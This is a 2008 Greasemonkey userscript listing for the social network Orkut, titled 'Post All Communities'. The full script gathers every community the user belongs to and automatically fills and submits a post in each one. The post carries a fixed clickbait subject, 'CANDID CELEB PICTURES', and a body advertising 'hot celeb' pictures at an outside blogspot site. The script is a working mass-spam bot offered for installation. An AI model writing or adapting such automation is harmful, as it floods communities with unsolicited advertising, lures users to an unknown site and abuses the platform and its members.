Post All Communities
By dreamydonkey
—
Last update Jul 25, 2008
—
Installed
36 times.
// ==UserScript==
// @name Post All Communities
// @namespace http://cyberneticz.blogspot.com
// @description Post a message in all the communities
// @include http://www.orkut.com/*
window.addEventListener("load", function(e) {
if(document.location.href.indexOf("Communities.aspx")>=0)
{
var anchorTags = document.getElementsByTagName('a');
var communities = "";
var j=0;
for(var i=0;i<anchorTags.length-1;i++)
{
if(anchorTags[i].href.indexOf("Community.aspx")>=0)
{
if(j>0)
{
communities=communities+",";
}
communities=communities+anchorTags[i].href.split("cmm=")[1];
j++;
}
}
GM_setValue("communities",communities);
GM_setValue("postCount",0);
document.location.href="http://www.orkut.com/CommMsgPost.aspx?cmm="+GM_getValue("communities").split(",")[GM_getValue("postCount")];
}
if(document.location.href.indexOf("CommMsgPost.aspx")>=0)
{
GM_setValue("postCount",GM_getValue("postCount")+1);
document.getElementById("subject").value="CANDID CELEB PICTURES";
document.getElementById("messageBody").value="VERY HOT CELEBS KATRINA PREITY DEEPIKA AND MORE HOT CELEBS
at http://www.pic-palace.blogspot.com/";
var form = document.forms[1];
form.action=document.location.href+"&Action.submit=Submit+Query";
form.submit();
/*
document.location.href="javascript:submitForm(document.getElementsByTagName('tr').item(15),'submit','');"*/
}
if(document.location.href.indexOf("CommMsgs.aspx")>=0)
{
if(GM_getValue("communities").split(",").length>GM_getValue("postCount"))
{
document.location.href="http://www.orkut.com/CommMsgPost.aspx?cmm="+GM_getValue("communities").split(",")[GM_getValue("postCount")];
}
else
{
alert("All the communities have been posted with the message");
}
}
}, false);